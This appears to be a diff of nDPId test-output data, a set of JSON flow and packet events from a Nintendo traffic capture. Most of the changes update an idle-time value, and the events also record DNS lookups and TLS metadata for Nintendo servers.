00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1500731320979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320979,"pkt":"AA6OGXEMfLuKifuECABFAAC4EUUAAEARHbnAqAxyhgP4GcuX3nsApFX2MquYZAL7A4KXVkGB7PFoUbxdy4R+OmcG274R5p1cluqPszGtOrY8\/h+Ka07KRMGhZXANoJoSM7n8ukD4QCqQX5N8LEBCJOczUrsTufJdxx5Y+oG3liR0QxxR9Ffs8WhRvF3LhH46ZwbbvhHm7EcDtxNE8JSi4yBs1WWoHG7r\/Cy+MHjWKN4dY\/SnlSlGAKEox5xvXQo9d3RTFT0k"} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1500731320980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1500731320980,"pkt":"AA6OGXEMfLuKifuECABFAAC4EUYAAEARL7TAqAxybRX\/C8uXxEsApGfqMquYZAJGA3OXVoUOaa8xKMh3YxOqQfCOROhuZZ1cluqPszGtOrY8\/h+Ka05RJidBwdgpJSzxyPBzPUj\/QCqQX5N8LEBCJOczUrsTufJdxx5Y+oG3liR0QxxR9FdprzEoyHdjE6pB8I5E6G5l7EcDtxNE8JSi4yBs1WWoHG7r\/Cy+MHjWKN4dY\/SnlSlX+kXE8MPCEZprJe3ihEAS"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7440000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1500731322454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1500731322454,"pkt":"fLuKifuEAA6OGXEMCABFAACYFZdAAOUGcTo2uwq5wKgMcgG7vMgz\/J5Zi2972IAYALkcKwAAAQEICgQM20EAGkXPFwMDAF\/eldsI13HzPlUjJzvSUWyEIzWGgbOyhWxdkIHfN3lgjdjjc7JiXYu\/ooQ\/gzWIbwSHhgUl7CbzYWzRlB2Fe4u0GxVFMrAIoxb4XR3ehSS5gi8Kq9fYRepj92tegMbl5w=="} -00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1500731322460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1500731322460,"pkt":"AA6OGXEMfLuKifuECABFAABnEVxAAEAGGqfAqAxyNrsKubzIAbuLb3vYM\/yevYAYBAhG+gAAAQEICgAaYTYEDNtBFwMDAC4AAAAAAAAAKH6viddQUv6VCP9kwNVv1cM5qFQr1yPk5rVuTEPwOaETSFnM6WhQ"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1500731322761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731322761,"pkt":"fLuKifuEAA6OGXEMCABFAAA0FZhAAOUGcZ02uwq5wKgMcgG7vMgz\/J69i298C4AQALmNxAAAAQEICgQM25wAGmE2"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731322454,"flow_last_seen":1500731322454,"flow_idle_time":7560000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1500731322454,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1500731322454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1500731322454,"pkt":"fLuKifuEAA6OGXEMCABFAACYFZdAAOUGcTo2uwq5wKgMcgG7vMgz\/J5Zi2972IAYALkcKwAAAQEICgQM20EAGkXPFwMDAF\/eldsI13HzPlUjJzvSUWyEIzWGgbOyhWxdkIHfN3lgjdjjc7JiXYu\/ooQ\/gzWIbwSHhgUl7CbzYWzRlB2Fe4u0GxVFMrAIoxb4XR3ehSS5gi8Kq9fYRepj92tegMbl5w=="} +00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1500731322460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1500731322460,"pkt":"AA6OGXEMfLuKifuECABFAABnEVxAAEAGGqfAqAxyNrsKubzIAbuLb3vYM\/yevYAYBAhG+gAAAQEICgAaYTYEDNtBFwMDAC4AAAAAAAAAKH6viddQUv6VCP9kwNVv1cM5qFQr1yPk5rVuTEPwOaETSFnM6WhQ"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1500731322761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731322761,"pkt":"fLuKifuEAA6OGXEMCABFAAA0FZhAAOUGcZ02uwq5wKgMcgG7vMgz\/J69i298C4AQALmNxAAAAQEICgQM25wAGmE2"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1500731323269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323269,"pkt":"AA6OGXEMfLuKifuECABFAABoEV8AAEARLjHAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="} 00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} @@ -31,16 +31,16 @@ 00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1500731326628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731326628,"pkt":"fLuKifuEAA6OGXEMCABFAAELMF9AAEARb7\/AqAwBwKgMcgA1SboA95AtAEmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAeAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAAPAAENsAb2cBQAAEAAQAAADwABDbAG8TAUAABAAEAAAA8AAQ2wBsnwFAAAQABAAAAPAAENsAbUcBQAAEAAQAAADwABDbAG0rAUAABAAEAAAA8AAQ2wBuuwFAAAQABAAAAPAAENsAbaMBQAAEAAQAAADwABDbAGwg="} 00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326644,"flow_last_seen":1500731326644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731326644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1500731326644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326644,"pkt":"AA6OGXEMfLuKifuECABFAAA8EXNAAEAGCZbAqAxyNsAb2aItAbvSLGpEAAAAAKACgABWsQAAAgQFUAEDAwYEAggKABpxjAAAAAA="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1500731326676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326676,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZgg2wBvZwKgMcgG7oi3AHA3T0ixqRaAScSCE4wAAAgQFrAQCCAqn0Wp9ABpxjAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1500731326680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731326680,"pkt":"AA6OGXEMfLuKifuECABFAAA0EXRAAEAGCZ3AqAxyNsAb2aItAbvSLGpFwBwN1IAQAg4imAAAAQEICgAaca+n0Wp9"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731329336,"flow_last_seen":1500731329336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731329336,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1500731329336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329336,"pkt":"AA6OGXEMfLuKifuECABFAAAoEX5AAEAGM1vAqAxyNpLySi0OAbv6FA+Od8xLzVAQEsCrFwAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329520,"pkt":"fLuKifuEAA6OGXEMCABFAAAo9shAACwGYhA2kvJKwKgMcgG7LQ53zEvN+hQPj1AQn2AedgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326644,"flow_last_seen":1500731326644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731326644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1500731326644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326644,"pkt":"AA6OGXEMfLuKifuECABFAAA8EXNAAEAGCZbAqAxyNsAb2aItAbvSLGpEAAAAAKACgABWsQAAAgQFUAEDAwYEAggKABpxjAAAAAA="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1500731326676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326676,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZgg2wBvZwKgMcgG7oi3AHA3T0ixqRaAScSCE4wAAAgQFrAQCCAqn0Wp9ABpxjAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1500731326680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731326680,"pkt":"AA6OGXEMfLuKifuECABFAAA0EXRAAEAGCZ3AqAxyNsAb2aItAbvSLGpFwBwN1IAQAg4imAAAAQEICgAaca+n0Wp9"} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731329336,"flow_last_seen":1500731329336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731329336,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1500731329336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329336,"pkt":"AA6OGXEMfLuKifuECABFAAAoEX5AAEAGM1vAqAxyNpLySi0OAbv6FA+Od8xLzVAQEsCrFwAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1500731329520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329520,"pkt":"fLuKifuEAA6OGXEMCABFAAAo9shAACwGYhA2kvJKwKgMcgG7LQ53zEvN+hQPj1AQn2AedgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340826,"flow_last_seen":1500731340826,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731340826,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1500731340826,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1500731340826,"pkt":"AA6OGXEMfLuKifuECABFAAAsEYIAAEARLkrAqAxyI55KPdprgjYAGGgmAAAAAAAAAAAAAAAAAAAAAA=="} 